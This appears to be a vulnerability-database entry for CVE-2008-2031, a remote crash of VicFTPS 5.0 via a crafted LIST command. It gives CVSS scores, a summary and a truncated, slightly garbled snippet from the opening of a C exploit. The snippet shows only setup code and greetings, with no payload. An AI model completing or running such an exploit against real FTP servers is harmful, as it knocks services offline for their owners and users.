5
CVSSv2

CVE-2008-2031

Published: 30/04/2008 Updated: 08/08/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

VicFTPS 5.0 allows remote malicious users to cause a denial of service (crash) via a crafted LIST command, which triggers a NULL pointer dereference. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.

Vulnerable Product Search on Vulmon Subscribe to Product

vicftps vicftps 5.0

Exploits

#include <cstdio> #include <winsock2h> #include <memoryh> #define __z00ro(a) memset(a,0,sizeof(a)); //greetings : SiDpsycho //Smallest greetings : Gorion - lofamy cIem We want be like y0U :*** unsigned int setport(const char* port){ if((atoi(port)==0) || (atoi(port)<0)){ return 21; } return at ...